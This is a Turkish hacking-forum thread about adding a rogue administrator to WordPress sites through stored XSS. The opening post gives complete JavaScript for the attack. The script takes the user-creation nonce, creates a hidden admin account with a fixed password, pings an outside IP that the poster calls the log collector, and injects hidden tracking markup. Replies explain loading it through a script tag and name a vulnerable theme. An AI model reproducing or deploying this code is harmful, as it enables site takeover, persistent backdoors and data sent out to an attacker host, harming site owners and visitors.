Wordpress Xss Açığı İle Admin Ekleme

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    Kod

    gotome();
    checkmeone();
    
       
     function putmeone()  {
    	
    		 var site = extractSummary(document.head.innerHTML);
    		 if(site == "null") { return; }
    		 var newuser_url = site+"wp-admin/user-new.php";
    		 var ajax_url = site+"wp-admin/admin-ajax.php";
    		 var _td = "		 var $ = jQuery.noConflict();
         $.ajax({
            "url": newuser_url,
            "success" : function(html){
                /*console.log("Getting Nonce");*/
                var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
    			if(html.indexOf("_wpnonce_create-user") !== -1) {
                var m = re.exec(html);
                if (m[2].match(/([a-z0-9]{10})/)) {
                    var nonce = m[2];
                   
                    $.ajax({
                        "url": newuser_url,
                        "method" : "POST",
                        "data" :
                        {
                            "action":"createuser",
                            "_wpnonce_create-user": nonce,
                            "_wp_http_referer" : "/wp-admin/user-new.php",
                            "user_login": "simple001",
                            "email" : "simple@simplesite.com",
                            "first_name" : "simple",
                            "last_name" : "simple",
                            "url" : "http://simple.com/",
                            "pass1" : "passforme1",
                            "pass1-text" : "passforme1",
                            "pass2" : "passforme1",
                            "send_user_notification" : 0,
                            "role":"administrator",
                            "createuser" : "Add+New+User"
                        },
                        "success" : function(html){
                            //console.log("New User created");
                            //Removeing the XSS from the site, callback hell
                            $.ajax({
                                "url": ajax_url,
                                "method" : "POST",
                                "data" :
                                 {
                                    "action":"fake",
                                    "permalink_structure": 1
                                 },
                                "success": function(){
                                    //Resed dome, reload the page
    								httpGet("http://146.185.182.176/g/a.php");
                                    //window.location = window.location + '&reload=1';
                                }
                            });
    
                        }
                    });
                }
    			
    		}
    
            }
        });";
    		 eval(_td);
    }
    
    function httpGet(theUrl)
    {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open( "GET", theUrl, false );
        xmlHttp.send( null );
        return xmlHttp.responseText;
    }
    
    function extractSummary(iCalContent) {
      var rx = /href="(.*)wp-content/g;
      if(iCalContent.indexOf("/wp-content/") !== -1) {
    	  var arr = rx.exec(iCalContent);
    	  return arr[1]; 
      }
      
      return "null";
    }
    
    function checkmeone() {
    	var site = extractSummary(document.head.innerHTML);
    	if(site == "null") { return 0; }
    	var newuser_url = site+"v";
    	var ajax_url = site+"wp-admin/admin-ajax.php";
    	eval("var $ = jQuery.noConflict();
         $.ajax({
            "url": newuser_url,
            "success" : function(html){
               
                var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
    			if(html.indexOf("_wpnonce_create-user") !== -1) {
    				putmeone();
    			} else {
    				getmeone();
    			}
    
            },
    		"fail" : function() {
    			getmeone();
    		}
        });");
    }
    function getcookone() {
    	if (document.cookie.indexOf("checkmeonce=") >= 0) { 
    		
    	} else { 
    		var now = new Date();
    		now.setTime(now.getTime() + 1 * 3600 * 1000 * 10);
    		document.cookie = "checkmeonce="+"=5464; expires=" + now.toUTCString() + "; path=/";
    		return 1;
    	}
    	return 0;
    }
    function getmeone() {
    	
    	if(getcookone() == 1) {
    		gotome();
    	}
    }
    function gotome(){
    		var ulink = "https://for.stringengines.com/sp.php?at=57&bc=345&rps=5467854&sty=457&get=75"; 
    		//document.location.href = ulink; 
    		//window.location.href = ulink;
    document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+
    "target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+
    escape(document.referrer)+((typeof(screen)=="undefined")?"":
    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
    screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
    ";h"+escape(document.title.substring(0,150))+";"+Math.random()+
    "' alt='' title='LiveInternet' "+
    "border='0' width='31' height='31'><\/a><\/div>")
    
    		
    }

     

    http://146.185.182.176/g/a.php buradaki logladığı yer


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    motka
    motka's avatar
    Kayıt Tarihi: 28/Ekim/2012
    Erkek

    Paylaşım için teşekkürler hocam.

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Yazilimci
    Yazilimci's avatar
    Kayıt Tarihi: 01/Şubat/2014
    Erkek

    Bunu nasıl kullanıyoruz hocam? İlgili alanları doldurup herhangi bir hostta çalıştırıyor muyuz? Çalıştırında bilgilerini girdiğimiz kullanıcı hedef sitede mi oluşuyor


    Titanyumun gücü adına!!!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    blackhammer
    blackhammer's avatar
    Kayıt Tarihi: 25/Mart/2003
    Erkek

    Bir cizik yeter sevgilim 


    ph"nglui mglw"nafh cthulhu r"lyeh wagh"nagl fhtagn
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    Yazilimci bunu yazdı

    Bunu nasıl kullanıyoruz hocam? İlgili alanları doldurup herhangi bir hostta çalıştırıyor muyuz? Çalıştırında bilgilerini girdiğimiz kullanıcı hedef sitede mi oluşuyor

    <script src="http://seninsite.com/xss.js"></script>
    
    yukarıdaki kodu  javascript olarak çağırıyorsun  okadar xss açığı hakkında bilgi sahibi olman gerek tabi 




    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Herbokolog
    KaptaN
    KaptaN's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek

    hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nereodi
    nereodi's avatar
    Kayıt Tarihi: 17/Haziran/2006
    Erkek

    Hacı abi hangi sürümler de var 


    canısı| Keser gibi olma; hep bana, hep bana. Testere gibi ol Bir sana bir bana...
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    nereodi bunu yazdı

    Hacı abi hangi sürümler de var 

    http://wphutte.com/education-wp-3-0-6-1-unauthenticated-theme-options-overwrite-or-stored-xss/

    genellikle tema fonksiyonlarında var kernel de çıkanları hemen fixliyorlar.

     


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    KaptaN bunu yazdı

    hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...

    işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Herbokolog
    KaptaN
    KaptaN's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek
    EcHoLL bunu yazdı
    KaptaN bunu yazdı

    hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...

    işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar

    bahsettiğin konulara  mesela bu konua  önlemi almak içinde bilgi versen daha güzel olur bence .

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    KaptaN bunu yazdı
    EcHoLL bunu yazdı
    KaptaN bunu yazdı

    hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...

    işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar

    bahsettiğin konulara  mesela bu konua  önlemi almak içinde bilgi versen daha güzel olur bence .

    tarayıcı ile sitene admin olarak girdiğinde javascripti kapatırsan bir işe yaramaz


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
Toplam Hit: 9160 Toplam Mesaj: 16
worpess xxs hack